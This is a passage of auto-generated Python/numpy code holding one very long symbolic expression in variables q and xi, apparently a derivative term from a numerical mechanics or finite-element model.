0]**2)**3 - 2133.33333333333*q[1, 0] + 2133.33333333333*q[2, 0]), -160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 
0]*q[2, 0] + q[2, 0]**2)**2 - 1053.49794238683*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 4.44444444444444*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 
12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - 
q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + 
q[5, 0] + 0.45))*((-2435345366.92287*q[1, 0] + 2435345366.92287*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-505679.012345679*q[1, 0] + 505679.012345679*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 252839.506172839*(q[1, 0] - q[2, 0])**2*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + (47945861.911294*q[1, 0] - 47945861.911294*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (76968939991.6364*q[1, 0] - 76968939991.6364*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2133.33333333333*q[1, 0] - 2133.33333333333*q[2, 0]), (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + 
q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 
0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 
8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 
- q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])), (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) 
